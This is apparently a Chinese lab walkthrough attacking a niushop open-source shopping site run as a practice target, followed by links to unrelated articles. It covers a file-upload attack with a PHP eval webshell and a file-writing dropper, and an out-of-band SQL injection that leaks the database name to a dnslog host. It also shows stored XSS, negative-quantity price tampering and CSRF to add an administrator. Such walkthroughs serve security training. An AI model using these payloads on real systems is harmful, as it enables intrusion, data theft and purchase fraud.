niushop开源商城靶场漏洞

文件上传漏洞

先注册一个账号

来到个人信息修改个人头像

选择我们的马

#一句话(不想麻烦的选择一句话也可以)

<?php @eval($_POST["cmd"]);?>

#生成h.php文件

<?php

fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');

?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

SQL注入漏洞

我们查看后台寻找功能点发现有一个地方可以执行 sql 命令

我们输入一个 sql 语句

发现没有回显,这时我们可以考虑使用外带注入

(select load_file(concat('\\\\',(select (database())),'96toab.dnslog.cn.dnslog.cn\\abc')))

得到数据库的名字为 niushop_b2c

获取表名

XSS漏洞

后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作添加管理员链接

添加管理员用户

BP抓包;制作SCRF

复制下来制作链接

admin管理员在已登录的状态点击我们的链接

相关推荐
无懈可击26 分钟前
FormCreate表单设计器AntDesignVue版本开源啦!
前端·vue.js·开源
只有一斤了呐14 小时前
超硬核!教你手搓一套船新架构的前端脚手架~
前端·javascript·开源
数字供应链安全产品选型17 小时前
2025移动端软件供应链安全开源治理方案最佳实践
网络·人工智能·安全·开源·开源软件
一匹电信狗17 小时前
【Linux我做主】基础命令完全指南下篇
linux·运维·服务器·c++·开源·centos·unix
OpenTiny社区18 小时前
TinyEngine2.3版本发布:界面更美观、操作更便捷、路由能力再次升级
前端·低代码·开源
阿木实验室19 小时前
论文分享 | HE-Nav: 一种适用于复杂环境中空地机器人的高性能高效导航系统
人工智能·机器人·开源·无人机·空地机器人
星哥说事19 小时前
开源通义万相本地部署方案,文生视频、图生视频、视频生成大模型,支持消费级显卡!
人工智能·开源·音视频
不会kao代码的小王1 天前
开源WAF雷池本地化部署与远程查看网站安全防护的详细操作指南
安全·开源
草梅友仁2 天前
Mermaid 流程图与 Open-Sora | 2025 年第 11 周草梅周报
开源·github·资讯
邹霍梁@开源软件GoodERP2 天前
【DuodooTEKr】 基于Python+OCR+DeepSeek的英国购物小票识别系统开发实战
人工智能·python·物联网·开源·制造